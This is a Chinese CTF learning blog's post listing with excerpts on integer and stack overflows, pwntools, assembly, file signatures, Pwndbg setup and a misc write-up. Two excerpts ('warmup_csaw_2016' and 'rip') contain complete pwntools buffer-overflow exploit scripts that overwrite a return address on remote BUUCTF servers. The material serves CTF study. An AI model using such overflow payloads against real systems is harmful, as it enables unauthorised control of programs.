- 博客(15)
- 收藏
- 关注
原创 整数溢出
整数分为有符号和无符号两种类型,有符号数以最高位作为其符号位,即正整数最高位为1,负数为0,无符号数取值范围为非负数,常见各类型占用字节数如下:当程序中的数据超过其数据类型的范围,则会造成溢出,整数类型的溢出被称为整数溢出。...
2020-05-01 21:21:32
1101
原创 BUUCTF|warmup_csaw_2016 1
from pwn import *context.log_level = 'debug'io=remote('node3.buuoj.cn', "28247")payload = "A"*(0x48) + p64(0x40060D)io.sendline(payload)io.interactive()
2020-04-30 09:59:00
1230
1
原创 BUUCTF|rip
from pwn import *context.log_level = 'debug'io=remote('node3.buuoj.cn', "28808")payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186)io.sendline(payload)io.interactive()
2020-04-30 07:51:53
2128
4
原创 栈溢出原理
了解栈溢出,首先要了解什么是栈。栈是一种典型的先进后出( First in Last Out )的数据结构,其操作主要有压栈(push)与出栈(pop)两种操作。
2020-04-28 19:48:15
690
原创 pwntools介绍及使用
什么是pwntools?简单来说就以一整套pwn工具集,涵盖了pwn题利用脚本所需要的各种工具。Pwntools主要作用?包括方便的IO交互函数,ROP、格式化字符串等利用的自动化工具,shellcode生成器等等。为什么选择pwntools?目前最好用也是仅有的大型pwn利用框架。能节省大量编写脚本的时间。Pwntools模块总览pwntools使用参考文献Pwnlib.asm...
2020-04-27 13:08:02
12487
原创 攻防世界之pwn新手区
level2guess numint overflowlevel0level3level2## guess num## int overflow## level0level3
2020-04-27 11:38:22
366
转载 高地址&低地址、高字节&低字节、大端小端和储存顺序
参考博客https://blog.csdn.net/ce123_zhouwei/article/details/6971544https://my.oschina.net/alphajay/blog/5478一、高地址和低地址二、高字节低字节如int a=16777220,化为十六进制是0x01 00 00 04则04属于低字节,01属于高字节三、大小端模式(1)如果a在内存中的存放...
2020-04-26 12:34:48
5336
转载 Crypto使用
安装与使用Crypto 算法库在 python 中最初叫 pycrypto,这个作者有点懒,好几年没有更新,后来就有大佬写了个替代库 pycryptodome。这个库目前只支持 python3,安装也很简单pip install pycryptodome就行了!详细的用法可以看看 官方文档常见对称密码在 Crypto.Cipher 库下,主要有:DES 3DES AES RC4 Salsa20...
2020-04-26 09:03:59
2102
原创 CTF常见文件头
标题文件头文件尾总结JPEG (jpg), 文件头:FFD8FF 文件尾:FF D9PNG (png), 文件头:89504E47 文件尾:AE 42 60 82GIF (gif), 文件头:47494638 文件尾:00 3B ZIP Archive ...
2020-04-25 20:18:20
569
原创 2020.4月安恒月赛之杂项
blueshark发现是取证题,首先寻找特殊字符串,找到一个what_you_want.7z下面的16进制头是377abc是7z压缩包文件头,将之复制出到winhex。保存7z压缩包,里面有一个加密文件。提示密码是蓝牙密码。在wireshark中查找字符串,PIN,发现密码最后打开文件,得到flagflag{快去试试吧!}...
2020-04-25 18:17:15
623
原创 Pwn学习之汇编基础
汇编是什么:计算机执行的语言都是以1和0的二进制语言,物理上则表现为电信号的高低电平。汇编语言把机器指令翻译成容易理解的语句。例如:1000100111011000 # 机器指令MOV AX,BX # 汇编指令相对于机器指令,汇编指令更容易理解。不管是REVERSE还是PWN都需要了解基本的汇编语法知识。了解寄存器:寄存器是计算机暂存指令、数据和地址的地方常用寄存器:...
2020-04-24 15:12:27
1475
1
原创 Misc题目分类及使用工具篇
流量分析:Wireshark文件分析:binwalk010Editorwinhex隐藏文件提取:foremostbinwalk图片隐写:PsStegsolve音频隐写:Audacity视频隐写:Pr密码破解:CTFcrack其他工具:QR(二维码扫描)...
2020-04-24 10:24:19
1970
1
原创 Ubantu下Pwndbg的安装
前置条件:安装python3.5版本sudo apt-get install python3.5安装pwndbg:git clone https://github.com/pwndbg/pwndbgcd pwndbgsudo ./setup.sh安装成功后:gdb # 输入pwngdb> # 回显...
2020-04-24 10:07:22
4844
原创 Pwn学习流程
Pwn前置技能:汇编语言C语言pythonlinux系统Pwn环境搭建:ubantu(64位)python2pippwntoolspwndbg32位libc库……
2020-04-23 22:11:39
453
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人